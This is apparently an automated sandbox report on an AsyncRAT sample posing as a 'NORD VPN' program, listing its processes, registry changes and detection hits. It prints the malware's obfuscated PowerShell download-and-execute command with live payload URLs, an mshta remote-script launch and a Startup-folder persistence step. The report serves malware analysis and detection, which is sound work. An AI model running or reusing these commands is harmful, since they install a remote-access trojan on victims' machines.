          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: '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'
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engineClassification label: mal92.troj.evad.winEXE@12/12@5/7
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xGrfj8RvYg.exe.logJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ligmpoba.nku.ps1Jump to behavior
          Source: xGrfj8RvYg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\xGrfj8RvYg.exe 'C:\Users\user\Desktop\xGrfj8RvYg.exe'
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: xGrfj8RvYg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: xGrfj8RvYg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: xGrfj8RvYg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

          Data Obfuscation:

          barindex
          Obfuscated command line foundShow sources
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: xGrfj8RvYg.exeStatic PE information: 0xDE169215 [Tue Jan 27 05:52:21 2088 UTC]

          Boot Survival:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
          Source: C:\Windows\System32\mshta.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
